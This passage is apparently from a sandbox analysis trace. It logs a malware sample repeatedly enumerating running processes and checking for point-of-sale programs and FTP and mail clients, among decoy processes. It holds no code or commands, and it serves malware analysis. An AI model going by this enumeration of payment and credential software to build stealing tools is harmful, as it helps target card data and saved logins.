th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0242.507] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0242.510] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0242.515] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0242.517] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0242.525] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0242.527] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0242.530] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0242.532] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0242.535] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0242.537] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.539] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0242.542] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.544] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.546] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0242.549] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.553] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0242.556] CloseHandle (hObject=0x22e4) returned 1 [0242.556] Sleep (dwMilliseconds=0x64) [0242.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22dc [0242.678] Process32First (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.680] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.683] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.685] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.688] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.690] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.693] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.695] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.697] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.733] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.736] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.739] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.777] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.780] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.782] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.784] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.787] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.790] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.793] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.795] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.798] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0242.800] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.802] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0242.844] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.846] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0242.849] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0242.852] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0242.855] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0242.858] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0242.861] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0242.863] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.865] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.867] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0242.870] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.872] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.875] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.877] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.879] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.920] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0242.923] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0242.925] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0242.927] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0242.930] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0242.933] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0242.935] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0242.938] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0242.940] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0242.943] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0242.945] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0242.947] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0242.949] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0242.951] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0242.954] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0242.955] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0243.031] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0243.034] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0243.037] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0243.050] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0243.053] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0243.056] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0243.060] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0243.063] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0243.065] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0243.069] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0243.071] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0243.074] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0243.128] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0243.130] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, 